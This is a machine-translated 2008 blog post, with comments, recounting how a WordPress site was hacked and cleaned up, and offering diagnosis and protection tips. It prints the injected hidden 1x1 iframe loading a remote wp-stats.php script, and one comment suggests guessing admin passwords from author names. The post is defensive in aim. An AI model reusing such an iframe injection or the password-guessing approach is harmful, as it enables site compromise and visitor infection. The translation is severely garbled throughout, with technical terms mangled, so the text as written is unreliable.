搜索引擎人民
特色客戶
認證
歡迎! 感謝您訪問!
訂閱充分飼料
WordPress的遭到入侵:你保護?
由TheWis 。
超過7年來,我一直在網站工作的基礎上流行的應用程序,如WordPress的, Vbulletin和PHPnuke 。 在處理這種流行的應用程序,詞如'黑客'或'的安全漏洞,將成為東西就會使用任何處理或擔心。
在過去的2年,但也有一些主要發展中國家的關切。 如今,黑客們更熟悉的重要性聯繫,因為有些可能是搜索引擎優化的,使用的是黑客為紐帶建立戰略或作為負面鏈接建設策略定位的排名競爭對手。 不論意圖的黑客,你的網站的排名可能會損壞到一定程度。
我的故事開始前幾天與谷歌顯示此消息相關的搜索引擎結果為我的個人網站。 “這個網站可能會損害您的計算機。 ”
同一天,我收到一個電子郵件,谷歌通知我這件事。 為了確保您收到此通知,確保您可以訪問abuse@yourdomain.com電子郵件。
該網站的問題是一個相對較小的一個基於WordPress的。 這使我回憶起事件一個月前,當黑客上傳超過10頁我的網站上。 每個網頁,這100多個鏈接指向許多最嚴重的網站在世界上,被上傳到我的上載可濕性粉劑目錄“ / wp-content/uploads / ”
這個目錄是一個相當容易的目標,因為它777權限。 我懷疑可能是一個個人搜索引擎優化,因為他知道,上載這些網頁將毫無意義,除非在這個目錄中有一定的聯繫,以便訪港的搜索引擎會知道這些。 其結果是,個人建立數万訪港鏈接到這些網頁,並把他們編入索引。 我發現關於這些網頁的唯一索引後,他們之前讓他們刪除。
在閱讀該郵件來自谷歌,我開始認為他們行動得太晚了這一事件,因為這樣,我沒有做任何更改,在網站上。 我唯一所做的就是下載整個網站的文件,並將它們掃描與間諜軟件,一切似乎乾淨。
接下來,我經歷了文件,並沒有發現什麼不對,所以我去了谷歌網站管理員工具 ,我發現幾乎整個網頁警惕的問題,審查的鏈接網站。 下面,我提出了修改要求。
兩天後,我重新檢查谷歌網站管理員工具只找到一種新的反應,包括4個谷歌的網頁(網址的)我的博客上有違規的代碼。 經過快速審查的網頁我發現了一個代碼重複所有這些,並沒有期待乾淨,因為它的iframe
“ ! -交通統計- ” <iframe src=http://xx.xx.xxx.157/iframe/wp-stats.php width=1 height=1 frameborder=0> “ / IFRAME中” “ ! -完交通意外統計數字- “
最後,我進行了一些額外的研究和發現,人們在WordPress的支持論壇討論同樣的問題 ,但是不知道的感染版本的WordPress的。 在我而言,我相信這是WordPress的2.5和/或可能是舊版本。 然後我檢查所有WordPress的文件在我的網站上,並沒有一人有此代碼,因此最有可能的代碼注入數據庫中使用xmlrpc.php有能力進口遠程內容來到WordPress 。
餘刪除違反規定的代碼和回去再次谷歌網站管理員工具,提出修改要求,並再次得到了訊息“此網站可能損害您的計算機。 ”刪除,我花了3天,以擺脫這個訊息,而許多人一直說可能需要最多15天的信貸此快速結果應當考慮到驚人的球隊落後谷歌網站管理員工具的球員有應付任何修訂要求在不到24小時,真正負責任地處理網站管理員遇到這個消息,他們知道它所造成的損害的任何網站。
希望這不會發生在你身上,但是如果這樣做,這裡有名單體檢進行:
如何診斷如果您的博客了這個問題:
1 -如果您覺得您的博客正在採取更多的時間比平常負荷,或者如果您看到在狀態欄消息說,連接到xx.xxx.x.157
2 -如果你查看源代碼的任何網頁在您的博客和看到此代碼。
3 -如果您的博客搜索引擎結果標有“此網站可能損害您的計算機。 ”或者獲得的任何郵件從谷歌在這方面。
如何解決這個問題:
1 -你的WordPress的升級到最新版本,並保持這樣做,每月基礎上,人們將弄清楚如何保持WordPress的安全軟件,以便依靠他們。
2 -升級WordPress的不會採取的代碼,你需要去感染後和使用HTML編輯按鈕在WordPress的和刪除的代碼,或如果你有PHP的MYadmin您可以使用它,只要選擇你的博客數據庫,然後去搜索,將在搜索框中的任何文字的代碼,如“化成” ,然後選擇表wp_posts擊中去,你會看到所有的感染職位。
如何保護自己的未來:
1 -如前所述,讓您的文字新聞更新到最新版本,並確保更新後的通知。
2 -每個月手動掃描您的WordPress的文件,看看如果你發現任何可疑的文件。
3 -檢查始終是您的webstat節的內容,並查看是否有任何網頁訪問記錄,但你不知道這些。
4 -檢查源代碼的您的帖子定期,以確保它是乾淨的任何惡意代碼。
隨著博客的策略是越來越青睞搜索引擎優化公司, WordPress的技術部分應包括所有的時間,一些技術人員節省了良好的市場營銷工作的人。 
張貼在博客 , 新聞 , 提示對2008年4月24日。
21回應迄今: 17評論和4引用
引用/ Pingbacks
[...]搜索引擎的人有很大的文章,最新一輪的WordPress的安全漏洞,並總結了很好這裡所發生的事在過去的兩個星期到攻擊的個人資料,惡意鏈接留下,其餘的它。 如果你想另一個分析破解,那麼你想要去閱讀這篇文章。 [...]
[...]遭受兩次) -這裡是兩個偉大的條款如何避免受到黑客攻擊,以及如何恢復,來自搜索引擎的人民和每日博客[...]
[...]是談論WordPress的安全漏洞,在搜索引擎的人,但我不知道這是否是一樣的,這就是一個固定或[...]
[...]遭受兩次) -這裡是兩個偉大的條款如何避免受到黑客攻擊,以及如何恢復,來自搜索引擎的人民和每日博客[...]
大後!
正如我閱讀後,我仍在努力解決我父親的博客,昨天砍死了...什麼疼痛感在“您知道是什麼” 。 我會使用你的技巧來解決,希望防止這種情況再次發生。
謝謝您。
沙娜
這正是發生在我的網站,到/ IFRAME中/等,植根於兩個文件中的內容。 同意xmlrpc.php文件以及它在歷史上有問題。
非常好,有益的信息。 謝謝您。 我也似乎得到過多的垃圾郵件提供的在線藥品刺激赫克了我。 我最近升級到最新版本的WordPress的,希望這將消失但仍然存在。 我的兒子是一個博客/搜索引擎優化大師,所以我也將通過這條給他。 感謝您抽出寶貴時間後這樣一個信息條目。
親切的問候,
羅比
我認為這是旨在wordpress.org和自我hostest域網站嗎? 我們在wordpress.com是安全的? 樣的? 排序的? 也許? ?
乾杯!
非常好的職位。 我同意網上藥品垃圾的垃圾郵件。 我不知道這些人的思想與濫發人人死亡。 也許防垃圾郵件程序。 我曾經有一些論壇,但刪除他們,因為垃圾郵件。 跟上偉大的書面非常好的東西。
你只需要建立一個abuse@domain.com並且您會收到這樣的郵件?
是否有任何其他的電子郵件應設立?
@沙娜
請讓我知道如果您需要任何幫助。
@丹
遺憾得知,只要確定您搜索您的文章使用數據庫,以確保違法代碼是不存在任何更
@羅比
殺垃圾郵件應該沒有問題,你甚至可以忽略它即使沒有造成任何損害的博客。
@ pKay
是我講的自我東道國在這裡,在您的情況下,您無權訪問的文件,以便升級WordPress的會照顧,對你,但我不知道文件的結構在這種情況下,如果是相同的,一些檢查將幫助也不大。
@皮特
謝謝,很好的方面,垃圾郵件是,它沒有任何直接損失的博客像黑客
@博客賺錢
實際上,這個領域我抓住所有的功能,所以我啟用了5電子郵件Goolge不同的電子郵件帳戶,但只有一個停留在我的頭腦abuse@yourdomian.com ,我將檢查如果我仍然有所有這些和後他們。
中的網頁上載目錄被濫用通過博客和論壇的垃圾郵件。 我們正在噸的垃圾郵件指向的網頁等。
@博客賺錢
以下列出的電子郵件,將得到一份谷歌的惡意軟件通知:
abuse@domain.com , admin@domain.com , administrator@domain.com , contact@domain.com , info@domain.com , postmaster@domain.com , support@domain.com , webmaster@domain.com
此郵件將開始這樣的:
尊敬的網站所有者或管理員domain.com ,
最近,我們發現,您的某些網頁可能導致用戶
感染惡意軟件。 我們已經開始顯示一個警告網頁
誰的用戶訪問這些網頁的點擊一個搜索結果中
Google.com上。
下面就是一個例子網址在您的網站上,可導致用戶
感染(空間插入,以防止意外的情況下,您的點擊
郵件客戶端自動鏈接的網址) :
非常有益的-但我寧願建議訂閱博客WordPress的發展得到通知緊急安全更新超過每月更新的時間表。
每月的時間表可能會離開你的博客脆弱多達30天內如果您錯過的修補程序僅一天。 這是一個永恆的黑客定位到您的網站。
我的一個WordPress的網站被侵一個月前,他們用它來發送垃圾郵件了幾個小時,在我關閉了。 我的主人認為,這是因為我仍然使用舊版本的略有WordPress的
所以我們還必須尋找安裝文件可以發送電子郵件,並可以繞過正常的電子郵件服務器procotols和safegaurds
通訊仍然是一個強有力的支持者之一,雖然WordPress的
我討厭這些人該死的iFrame黑客。
真正豐富的文章WordPress的-我將繼續我的眼睛睜得大大的!
我認為,黑客很容易WordPress的相比任何其他東西!
真正地,
看
大多數WordPress的博客管理員的用戶名和U只需要找到密碼。
只是幾個組合博客博客作者的姓名或名稱
簡單
在這個過程中獲得支持的一個黑客插入了代碼.. 我重新安裝當前版本的可濕性粉劑,然後再裝了一份我的數據庫和調整它的空氣間隙地方方塊。 然後,它將回去了,我會請願谷歌乾淨審查。
上帝幫助黑客如果我發現他/她... 。
遭受兩次) -我相信WordPress的正試圖修復的bug和漏洞continuesly ,但仍然要小心,你的密碼經常變化,很難猜測,取得了良好的託管公司,除了努力使備份頻繁。
沒有WordPress的不可以幫助您從砍死,這是一個令人悲傷的事實,但每個新版本,黑客還可以使用新版本,因此他們仍然知道該怎麼辦,以破解您的博客。
唯一的辦法保護自己是讓可濕性粉劑擔保(見網址) ,因為它需要你一步一步的做什麼改變的功能,您的博客,使黑客無法入侵您的博客。
WordPress.org不會做到這一點,你必須現在就採取行動,並保存自己製造了很大麻煩,今後..
詹姆斯